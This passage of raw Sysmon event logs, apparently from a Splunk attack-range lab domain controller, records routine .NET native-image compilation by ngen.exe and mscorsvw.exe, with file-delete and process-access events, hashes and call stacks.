\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023353Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.464{4DB9351A-A27D-60D3-A405-00000000CF01}4728NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GZM0XFACYU\MSBuild.ni.exe.auxMD5=BA1400669CEF6B433D9DD7AF714B1C53,SHA256=C7F42121F9BD2CCA47CB3F0809799E543F6C11DFF5D283083BCF95B16A1D0569,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023352Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.464{4DB9351A-A27D-60D3-A405-00000000CF01}4728NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GZM0XFACYU\MSBuild.ni.exeMD5=5530D103C7E92F113894F9FD371D5784,SHA256=1EF77957C7E417D35B0AF56C3479F80FA1B63EDA67628461D4A0DF4B261E3AA3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023351Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.449{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=40678848538B2515CEEA1623A7B17387,SHA256=A33BBB5E996E78D4B63052A7B627509A7695AC8FC692E4064D8CF5D5A91ECC5E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023350Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.402{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-A405-00000000CF01}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023349Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.386{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-A405-00000000CF01}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000023348Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.386{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-A405-00000000CF01}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64)
23542300x800000000000000023347Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.386{4DB9351A-A27D-60D3-A305-00000000CF01}3288NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\Y6CMZYNKMG\MMCFxCommon.ni.dll.auxMD5=E11A35EC3E0029AE49E5369FB485F117,SHA256=64BEE29B500AEF178E0EFF88364AF77FDF303AC2C09A6AED53947DB0E6CBD3CC,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000023346Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.371{4DB9351A-A27D-60D3-A305-00000000CF01}3288NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\Y6CMZYNKMG\MMCFxCommon.ni.dllMD5=2E4B4B450065CF19738D76E46947B6B3,SHA256=96A43B6EA5F0FFDC312F1622711D79B5D4D37DBC3436F1DF1D663BF38DFEC2DF,IMPHASH=00000000000000000000000000000000truetrue
10341000x800000000000000023345Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.355{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-A305-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000023344Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.339{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-A305-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023343Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.339{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-A305-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023342Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.339{4DB9351A-A27D-60D3-A205-00000000CF01}6672NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\YVBD3XS902\MMCEx.ni.dll.auxMD5=B42575F46BB80EA12B6C0051E853527D,SHA256=412DD5110E20B7A0C24082A52D6D7718703D42E8BC72694B1FD3021C24D53191,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023341Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.339{4DB9351A-A27D-60D3-A205-00000000CF01}6672NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\YVBD3XS902\MMCEx.ni.dllMD5=D791639E4F30D6EBDFB1E69926AE0197,SHA256=072318EE5BED3B494A3B9D6BCCA7B780B2EA770E52F6A91F1618389D745FEFB6,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023340Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.230{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-A205-00000000CF01}6672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023339Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.214{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-A205-00000000CF01}6672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023338Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.214{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-A205-00000000CF01}6672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023337Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.214{4DB9351A-A27C-60D3-A105-00000000CF01}6528NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PY4T3ZF1R3\MIGUIControls.ni.dll.auxMD5=BF97070AA56208857E77DDEEA83109BD,SHA256=326E6DD2BA8B9BF5B75CCA3205254E7AC10176D848FC87D18A06C1E9116EBAD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023336Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.214{4DB9351A-A27C-60D3-A105-00000000CF01}6528NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PY4T3ZF1R3\MIGUIControls.ni.dllMD5=76E9EEA02767C773A79339C1DBE27F82,SHA256=2765FB70B131CB5557BD89D48D348B01D6D224791EDEBD3B6144B20CEE629D8D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023335Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.199{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98C930BEE5780861962F40719D5F7270,SHA256=C3FA48A8DFF6851D9ABDD5C481D856E082F701E333385A825B1640A69684DC97,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023451Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:10.905{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27E-60D3-B705-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023450Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.889{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27E-60D3-B705-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023449Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:10.889{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27E-60D3-B705-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023448Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.889{4DB9351A-A27E-60D3-B605-00000000CF01}4996NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IJVDTCX7FV\SMSvcHost.ni.exe.auxMD5=F74A5C62673AADD6F7A27322D6F5B93E,SHA256=5849A104C973E1BAAD8DBA932E8ED081DA176A546418F816C4A020B256027654,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023447Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.889{4DB9351A-A27E-60D3-B605-00000000CF01}4996NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IJVDTCX7FV\SMSvcHost.ni.exeMD5=A245F968DBC50618BC1CD3606A115B62,SHA256=26D4260E0A153915A8A1DDED67B8ACA299F696D775A2E4C8ADA4F99E3B27C05B,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023446Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.826{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27E-60D3-B605-00000000CF01}4996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023445Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.811{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27E-60D3-B605-00000000CF01}4996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023444Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:10.811{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27E-60D3-B605-00000000CF01}4996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023443Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.811{4DB9351A-A27E-60D3-B505-00000000CF01}6568NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6J49RQU86W\SMDiagnostics.ni.dll.auxMD5=B3B2FF99EB867AF958674F42FEEFFFF6,SHA256=872F940493DB7736D87F8582B6E79191D08B83DFC74518E5DCCB0D56774E585C,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023442Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.811{4DB9351A-A27E-60D3-B505-00000000CF01}6568NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6J49RQU86W\SMDiagnostics.ni.dllMD5=0B3B438D2F1EF32655E8CACCB6F3464B,SHA256=FB9D103C858AB59E504D3371DEDA5FDBCE0E15875C3D1AA7FA196A0CC4BF529B,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023441Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.795{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27E-60D3-B505-00000000CF01}6568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023440Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 